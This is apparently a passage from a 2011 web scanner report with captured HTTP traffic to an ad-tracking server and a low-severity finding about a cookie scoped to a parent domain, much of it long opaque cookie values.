rhdMiSolHtUkaU9woFboI0gpEvgcSpvC6rRKSKvIVBxkKu6aTDQ3qvM9EyE1U4Up1zpIGHMftOgG74XPCd95sScSFvuK8duCYKnT000jVh9ooojowJpFoXZoqWOaZCpp1PBATAS6s59h1xaqvlGGaQufIEiW55ytgO/T1incBQ3ecpBIxMZdi0cAKzBDgKCyPxknZaaBnqoVHxjdk4GEQ9+dSjiFw4sFvkyrdgfzJyg5Cne6b7E6K9jbR2ShKCSz/z1iYgGkSf1mqGP2lYOknp9o3/ZIQ1pdcs+HKCapC8qO3tZVW2M7OBb0u1PAHPEGf+yyxkPuyrQgQ34G1Ue4G5uEAkslyh+qdighV5QpToqFJyc/3AdN6hvwFM3sM9S8kIH14MKuy0glR3WC7HNe92EpXQjDe7iS8W9AFNGwY+Su4SnW2JHCOjVeCwbXxPvMuVavDBAmKJh0f+sZvdXpMiD5ZTkGXqT1UPrX6yL4OXgJpnTkKwTxrcZqvSsarY5cDpvmaV+6Zj8OlMHCWJkhGpz/2aUDAqL7k/WFuOQq8UB70meEsDHwNFkXClqdFB2QjBC6zhg+Xfnw1RBV1z1dw+NxNxssSWTXYT2ftcXZ4aSkaO0bHNIV8ZlpGaZT734oOPjDIM5PRQ804RhNhFjsQzT7PaEm+F7rMQLCkOivvHsevPQLn9c8EsDN4AAZA2rPybhkASUk7KcA/7L69tZ970J/PfiTlPYMEBu3IZXHQS67TtsGkS1FcrJJQMON1F2xmxMttsEBFdmZa1qN6F7Jvk1dq5DQwWbqSYxVojZD4yqwR4UgXk0W+f/sWrYg6URPBpBM1L1NlF7NNEmd6XUkEa285x1gld6SQXL6pUaIZqSG8aeOCMe73GVxTY3cilD2Wn3wBRiL1jEHLwn3GwfFPIcatu3tJHPngQ4cjM+BSsmRvBPMktdaWA9nf3Z5lIOIzEUF4n/hDTCZvPRGeRJmRUg52vPzBdJ5BplGWhReHr2k3cHWeh9vfrO+YzbYBaEaM5dA==; rsiPus_LfEx="MLsXtSMNJjhvJZH0ecXcxPALFPJgPeDEnB2qzoP9NPmWyQk/VjEpNZvXbTc7xC8rSTKo6YlN1SF6IV+6n10UiflLT2U8DIkhMqvk/TPadDEwiYGhrf99bXY2VOe9PIcfFRS2P6RUqSEB0TCrYF8Mwl5Ft4iss5u2PcdW4RCO28mflq+zx7y5jWan2qeD/pgjsrpcuvvZ58koc6lkv9Wbf3FYrrNGgYepYSbJgMEs4ntfJnW6zLY1iDsPaemK0Cxu0wc437UwOR3AtaLYmTqlgPe9uWFyhkkPvscruICQ9QttHI6EJm+gxnV2AsZO6NBYkc13BhUde+ATmTyjCT2uIiBTpEKN68+kS5SUllpnkQOiUIyA1Bhj1EMSsYBBqD9q8UeY5CBMmssVv/k0psvyXSw5HRyMq4CzM99suNt+BbGLOOgz35UaOBqOry1/H628OBXRzAq3nuNEcugaVCo9DU9yPWttC7y9hgK+oehg5vxScvGb72JSjXQaXOpw7L1rFFt5BD8S1ubUY6a4V0TOhEnkNkEVLLoqJ2gRhBdO7yKsc2/TykD3WduHeAYOz/WjTp1D1cYmFHV70lPdo/AOtxs+mMv1H/DEGx3w79SWxS8DNnAY2ZpPyKGRwD5TrSZKyAXMuvGuWeppPQFbbXvVB04HnOa+KQ1UFmZe95Gc1ZklhC74G91viOqf5/A+FHJ5+03Qt/cf++x4VMtciiANWrHsZlMDfyC/wBa/7hRLUAEcrlmzAKQav//oAXsLV1uR7ToVXnZRpo8Ktb2IyG6Ej40Pa1pK0vrhK/U8YV/zg5OAIlWQgLtoI4xSSOi9A/4M15mXRKbsUBbI0XkMqMYcv6rBQelDT8rKAv42VUP82pBmxbEz+mZ4xlvd3QQO5wipygyRpWP7piT5JL1IDDctLTqO+tGo5TLMUw/TdkGl29SNy7c2DYyyu60LSamChaagFmTQPfZZHjkh6sjeuIo4GjYIReqmyZc408c//OQRKJwqwR0djVs1fAvuoyR4pb6/GF/7PYvA0Nr5XNe0f7FKwflVYaVNfTJENwQETJ6lRuL4N3oXheRyLeJFC/LuQhQ/LbtzQvpZ6wZY4Lv73s5Qivev8BhpdKORkRsdj26bVVkxSogq86lXe0N4NLeqoebgovNME11suzb+Wz0GMyowZkQgsAo8Ksxs40vCKx9c/5+lwcQu+tnCf3C+NT3OBAqBSX05QcoAdPa1RVbSLwW3hJxsBqxGLaQvUbv/TDc/HxnWDCbrIhrDDaqtmmk6zX/Hk3v7jn0EcFiPLdc+LjRq2eSrwkQeNODgRBKjTlm5+oTfqA8/C1R56wB660FQTC3btRMwszh94BZFirKNlaKPLTx91lk="; rsi_us_1000000="pUM14y+jOBYULQE0ur/Thhu0D2LK/OWnjvo88q/k8TGDoK3Z03QD+bEm3drz/lAH4PpnZegZFlhH/5C6yfmLvqu8ciZ2S0Lx7yq9wHoxUgmnQPwKvSfZ3AzY1r/NL4mN135xNvvtitbB6wzPhqDYbas/r4BUehWWM9HDtG5VYAXizGb0Z1krvChz67DxDZFkxEELUQKDUeKVdafc4Jx9Uau6Mr2gv0NvqJG4xJF4Pwd94ADjB/yJL9BchtTR2FgUu604d/PKipCwS+Xe59Yhf0QpOI+FlyFpXPQ/n6uECQ19kdGmwwEBRzBETenkVnLuiOfuj+Fgy0zl8puM381Vhio1YyAjD7RCILOU8pL1usRQvBW2xiNNS+5buc+4jKzh9LDdUho7DjCvndvhdJylJrdINjJKvhiuPW9yg5zp0U3feDfiUl5xQXQkACo7T3RHkzKArlq/kJLV0KW4ohD9tV2Q20UDMb+JG7zzgu7iWeblbtHYIMj/4tkXYh+1HE9DEbu9KxoengULxPdthpplIBL+ZwEE5aBQSRXqkNJFh0Ei5lS/JO2fhjyMohubGzQ7CxNQO24NWurKi8YfO64uca2p5XJKopOL/ow6aYePp1MwoS5w8ecleWV5FXTlO/5hJcgUREU701MORORUXKH+ldij0hroJCqhftp8ndqo6zvchixL2XgtWd7zlXCA8Mm0+4+1G/ZAkFRox24pcao9cZ554id6MQ2E1C3TyXi7WCGQ00eAeS3Ow7C8PmhawvesLXE22mcgENA2FV0QjTL0g9h6LvR7WZyGnVWdMdG74vyi/pT+lLyJfM/22BzF3GeK6BqwBtNtOJsRHGbBFWqgUzaKvNg0jrVzmhPDwmb41HyzqCtUm2jdevDY0p1/evcbfpHJthVtMNrhSK6qmR+/BRTQekg7NIXLiBoh72LRB0WsmfYhYoeOvHPtdzQgymDNjO/LWn2jSoBvengATfrNfGS9nwJd6U505Kt2QcpCP3+YCL7DaNTAkwJ3j2UnpWiWh84s2LnGPl9dErMzcF19XpL0bP7oa9xw/+areqQLrfIHNaEHDWC/IpCvCY8HNxkqymONGlO2BGaryGiLs/X0sg4UgeCB2usVICpN1xJwM9LAPOs3k5cXo7QfUsksigUlUhCXpUR/wQXSbnmqAjbetj4vcaz3mOx4x/oEzdUsxO/kNwmolgN1nz4rfuIQxrKCq3MsV+wq2FBexuALM527Ob1GDHkg5Dq7WgwyObOTgG58UDtNpkDQ+5X2yvNyt4BjTvdSbKmO3nsK3IbQyrRdZWmAQPBPYjUwafpDepy8TPax6MTfLmErBOmuD+fGsL6TGeLMBjoJtUtnFJ7GqBfjivl3/1maC5SWFmmJ0FrC4cewtJwtaLUfUY0Bei+KjqoqNyvXjmK6dCfy7agBJ1RRax3hu1jfMp0ZZn74PYbm0+nstnYnjnLIxOn98tvLXknQ/nR19CtYlibliAnYkhrafEGLcO2BUqau8wYIyE0ciGGtKs6jTSl8cRlLBRbZDCyPJIxBBfovlaeR0THs+wofPI1XgQ3QXiaCihtLPzvR4iGkCPSAqenfaZBqwC372TwnI+RS32sms74NwPqBuyLJTWNfchSh/rMbOQ7D27LqlecfZnu9mJuUZ5glYFZQ9RIha+KkNKk4Fd2TQD82sNXeHbumFrUWTXiU/hWVLVabDqIYWckhI8LEoqh5dxwWpagXKdztXuthBPw0k/4OlqVmtpAnb4kktw8xvo+bEAD2jH5c+QxhqO8zlhNTwDS7Hmh369J6"; rsi_segs_1000000=pUPF5EOheQIMpzaxu2F29/z47ssdu65JwQLVVzHG+gQ4O3XYcv0liDtqNncA2iFgL2J8iE+lziqupcY9YN6TjgPB/URf2EIYze5iw1zwYo3cxyLWWdlcMSklFjL3lv3he+DinphznJw8dBFO3JF3yN9vb0m/EfU7i4QN3XgXi9sMI8eDTXS1EJYkzBCdak0P+lJKJLJSP4SrLf4GjDHkiJHYeRmpYxTguttflNpTceCXmXUDEKmNCPnYmz688gmW9lXln0Iu50ISZ4nlDCGu0Phlq7Mdquaquc9MgO9Onat7SRNRSG20XG4EuTJB/2Kfkwq0VtfUJCSYQCaVR3OAjP+AyY9RHCodoLYL8MM7CbYhyj2dqR2mpUN0CsGM1VO3WhqRWLbTn9gDFyMS6Mvw0FJt3L5NoZX/TwWTccM/4ZvqVc/RyZUuuXTIwoDNTkoDv7o6yjm4spssnVPPAMiDmJeGpS2TOqNq2zqj1KEP1enJtmzhKVtArWUqH7iE+jEi5JgXR7TfVVLI990LpfBl8Pn6Mp6C4hIdVWAPt1Qx7l7bk6rIZXXiaWmCRyG9H5msDtsuJdb9A64YNGm9MME7IjJ46UiW0zLcrfFkdrTfME7UwzymIz+IHXY4x2WuzSMs6zm5SIfbs4XMuhainnxcv04/NNM=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+3QQxDDLIL4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGGVl/GdrOMZ/Y+D7DfFcJwE0NOQgtTXZ9dBXUlcd9Q/LtscVIqyW2v6s6iEhJeU8h9plWnekIohe7OqAUbNvDCQtVo1G6MP6VyyS5g/+R8CD4MNKTYYCqGMEVIWz+D0TSTE0xZdhpXd5uEGsYPs9a9DXiMU8QmAUwmcjd7W1GD5QQZOLlE8qZfxFeqiNuC1rBBItAl4Lntw6epFmD3xl1j5XMDlVX6aYKz9oKlGfwpIOEBVqqGVszIH728YaXNXBQJH5nKo4LB4ZFQpZu0JgRyk3dLYnNoOEpwwwYhyVv5CzYfdhF5MklDiZU+qfBs8iY3onXUAmhjxJL4K+A0XA8VLf7k4sc/0JZ8J48f0ieKvzBYmvkKhNNBEt+pfLsa64tp+Cq8rP8l9q1ab2Ks+lDPElWMSSTGMEs1zAQP2ma/t6XcuNTy3hG0Buuc42p2xc7IDD4/1U6MzVmWiTrAgBaH0BC9+6OqgKdS3rUQQ867v0y; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:43:53 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 16:43:53 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.143. http://pix04.revsci.net/I10985/b3/0/3/1008211/306033605.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/306033605.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXrNTCDRfrnhu4IU3vheM/Ns0vAjloMpK61eCPNQGTGFQ+Pxc0KjW0Xlx9X5zeVCOktMritE+GyIPrHmh/wJI9G0tz6rWCDZsNyLhfOjYs28Ifi7ZK7k5SPLCKDg5LCkkMizjb8d5LjjS3L2gH8oCROKAdneR4EgIKBwgNnoUm8k/Iwbc5r4m8aYFMryjeoiMTlzQ7R2IFcY8Q30Ro53whtEoiH/Bu+WoyryZgtVlkCSLPEeefZrCBZbLrD+//8WqGERGMitWzex0mmzhlaVCaVmQgGOu46YSaKRUQ0m04HBV+KheQbSZlO5VtneOe+StGD9+RalRkrNLXKMMvqWaSv8TRCG1D23sVtFUKOWM85Cnas1iHQaGKvNWNbdWFELSWX4cgfi8hl0kZCcw6ceuLt9P2NpiUf/MYlTYoG5t5eHvBNiLT+2/Xfw8sDm5o/dr/lyyqoyewPJyXyn2THfveLvEUUW1Bd8zRg/TVdUvxerT8QtDBYEHnka4DI4frtTQyQAIds+150VrGBN8g6cvpozUNuNqXY3MQ2j16ELBNs9WLdXNDp5Yk9JuCrco7FVu9BCTHbH9rdTRNtiXCHNBoTHfIEHfbB/8ByQ0arGQb+g8WX8PeyjYFloHg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:03:43 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/306033605.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_RHZz="MLsXtSMNJjhvJZE469KkOkhRwa7hUMAPxrf6hJoLLx2BmYMObzB9/hpep6X9LrEl9sHMS1EvCK92NbndG2piitFk5yhzPh3AIVVe5guypqizfE164bq2VDA3Fy31gPZUZAJ5sTqWaE97/6FPY2NufszctJYIDjVFtpycp0CIEltHOB+U0RTbUT3cHc8W0EV4iqheI1AH8ISaPnKFn1FT5mmIOzgAxND9Mg9PYeYOlc8T557OEvCNFR/x3+7hNcMjZObGUGz67ryVfVGvaWybhKMQRee9Z3sVsi19ph3Q5GGDZ84T8AUG+DNYLSZ/+kPU4CfoVTtTBhS2HEiMJn/UFx1Y8cXaep/vP4+/Qsju1+QkTgIvEdoQkA9q5EmGVImYrZwsnBgse6O9oXprvAFGD7eBmEajH0vCDSSfFvBhdYxZ95uL81mb4pmEbfQbInoc0f9Fste2QXT4HC10c0N4ZGhsPRWkuOoJ8JmGSaP+UV7lmfxjUoY3CD3kf9/FLHPoilOIUToKtKWTw3BaEEuoM8aMTXJKywVDrg21pMky2eg47TOkgPYernT9+JyUxXXNBU0bSNqJNveu41SGhU7LKEEb5W47/6Fm7w14aUhVX8BhsnW65v2ef5ouqG6FM4ic3WcbwRMdhz+tWriZd4IvHjXoTkaQvVjw/RPbJ7QaZy8RvCZLSLOcImyRn+BYMdeSa33zCHkA8KKwsG/sveFp6D86HdxeNIGAZ6A4EKPOypzL1IaWyMjwBFEJmquvJ53v+ViIL0ccqfp1GD6HhbFaYAlU1+r3IfVwahq8hpaACUvR1Ltit5PYT+j4xitcw42hpEbrFFzBhXot0hbrtXlKM+NMtDXBZcXBYi0O0qPDI0HmNf2EYnH81ruOA4jGXX5HHLzKBooKZS/9p7R3pffzbrXjQPcgR6HsN2oiipaux/qAI9YHAW7AqyO01XhXxriq4jAIFtnyvSVeNwt7i4akKnDujBYU9ZkI12qoTqF67Xk1usO2dtWltsQIwovUEM+DptnlN4jUuTbTYgtIINI5+XEK/Spf3sZoJyCFFfawdJk3OcbrWy38Vl2kK3T9RnQAOPHtujBtZlECpIwPiOnWbX2xVjb92J7p9ujkjbArbun0dzjwI+dPIaE12xV2JwN0VjfL5f3/yOosBB3QMuZRKHCWcFuMIMmmVE/iudJUTwa42AimumgAKAJEGT+uDq/WPU3dy7QCr/MmedbUut7XRz4jRQx/oRKsNgzBeVM0lF7vZcCsSFXJu5IWWcEGkJMQ+3PDetSQ3QdE9/i9rW51wGEJyA7EHMC20nBW2EuLkF/2MO0/Qb37AgH5OzNFx/EOCweAh9VF2Epbl4Kr4adPuTnfrw=="; rsi_us_1000000="pUM14ylHMAYUro/iNjvZS/dv0heIr4yK3chvrx/QakneVQkuZx1nbEFMJkgtgyFWEYjs4FFmOldZwmtu231pw2GWfIfmHX/MWTqyDsN/zSkJjPw6NCL7HzLRrPTcM5b/49PxRvOnmVXpyMGqkhODOfUaKYXbf1osVIpINQm5t1M553eZgF067Z0fr/71LYGadZtpblVtBJVyPUKhuXULmZayWCODNJHm57BwO93yF4TPLYq1UoBndUnRsMRXELurAYNEVY9BOtr1JxLtMxJ+39X+3fhTwKN5S+2O8JbTR5AG7TlQBEuzzmOMJofjLa9X/wSFarpKfPRwg5HsCnWWbMOyoj7FgTE8HCBMJT/YKWpsAyb96DMH3f1UoM0KSoElHiPQCXmM9CgCnBSAoJoaVsbnmRCX3+a/YXw6TFQxdKnUKk1YNxGFzGAJDLfytO75D27VrMXgTV34uzGEhWTDzlCMe04s1boaUimseoXwmkl3fw+GuEOI+p+k2J4nChWtMi0quAqhdaAI+cboMVdV4r/daA6IeNXsAKRHDlfz96j30NWF/jEkXvNmAwddPUYR4t9E5IfF2wXyr67tO57F4S5b1+G81Hs2zMwxacLSj/Wmnamabwx7biRfVia42s1LISG2/71CJfCh9UYfqejZYEx51DbUhGfT9VOLhWPh05ZWawcFNAyYHP4Ii62YBKANyKeOhHJTL9xahJIDP3NdyjoTRAvlf439utP6NGwh3Zjl24NhEaN3ID3pwxsFw4W16z5GtV5iuApv+izTuRCW1Yo163U7Fgpj7j2nebvVZXxwQxM/ITWO7rd0toTFxOmQ0ZrgFo7yLhszcNFnE8Ih4+vwrjEDgt0WTO2jPooNIZWqmd+5MSp+D7stbYLrpC8BpvGxvybFb9aMU0GBjJeJqrv/VnS13xrNz5Cs+GZ775yKAcEDY8VRvB7bjMeBRS2lG46Udf6M1JW4mZIFb/h5C4ZNCO8IV2mwp0R+xi0lSfmOSsobQut40tp2Td+t/K1ajU44rfD+2sUMRiK7jZHH6E9JXjQGQGh2YmclZFZAhDXokt8uYhkpUU6/A5odvbyz2SYTGyD4XP9cyr7JnkUKKOLUqeFJGbjjbfluJ+fg5WS4w1QUG2GfmlYdc01IhnXTYPeYpQkSvZkHhv6BHjJ6+fm5/Kga9hWI9/4EzdWtRfC8JwnY1gN1n34rfr7QB7KKo38sV/AmGNBexuALM5v7Ob9GDFEg5D+4WgzyPrMTgW58UDtNpkDQ+5X0yjNwtoCjj/da4AeLMb5e92NgLiw5Wbpu9Rloh2YJcmVkZXCE3gQNsFSSLZZQkj+C3z9LCGUvGbQEkfe7xZ4zgxGxeXc8vbL1+KfdPcNEKZROr4pfC9AWMsOsimOLOY4y+6Dl6AZ5z5TU1ecdX0zhhr5ozxO/0DeyTtj7fV4gv4+tFH9OwTNS9uneiYy7